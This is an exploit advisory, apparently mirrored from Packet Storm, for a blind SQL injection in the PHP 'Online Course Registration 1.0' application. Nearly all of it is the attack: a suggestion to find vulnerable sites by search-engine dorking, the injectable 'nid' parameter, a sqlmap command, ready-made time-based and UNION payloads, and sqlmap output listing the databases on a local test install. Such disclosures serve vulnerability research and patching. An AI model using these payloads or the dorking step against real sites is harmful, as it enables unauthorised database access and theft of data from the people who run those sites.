Online Course Registration 1.0 SQL Injection exploit

Share

## https://sploitus.com/exploit?id=PACKETSTORM:181292 ============================================================================================================================================= | # Title : Online course registartion 1.0 Blind SQl INjection Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.2 (64 bits) | | # Vendor : https://phpgurukul.com/wp-content/uploads/2018/05/Online-course-registartion-Using-PHP.zip | ============================================================================================================================================= poc : [+] Dorking İn Google Or Other Search Enggine. [+] Use Payload : news-details.php?nid=if <====== inject here [+] E:\sqlmap>python sqlmap.py -u http://127.0.0.1//onlinecourse/news-details.php?nid=if --dbs --- Parameter: nid (GET) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: nid=if' AND (SELECT 2934 FROM (SELECT(SLEEP(5)))FpMu) AND 'XUff'='XUff Type: UNION query Title: Generic UNION query (NULL) - 4 columns Payload: nid=if' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7178787a71,0x41555a676d41466755754547656455487a544c50476163444b6d6a684b744d506c6c4e4b4e654550,0x7178766271)-- - --- [14:13:02] [INFO] the back-end DBMS is MySQL web application technology: PHP, Apache 2.4.58, PHP 8.0.30 back-end DBMS: MySQL >= 5.0.12 (MariaDB fork) [14:13:02] [INFO] fetching database names available databases [1]: [*] onlinecourse Greetings to :============================================================ jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr | ==========================================================================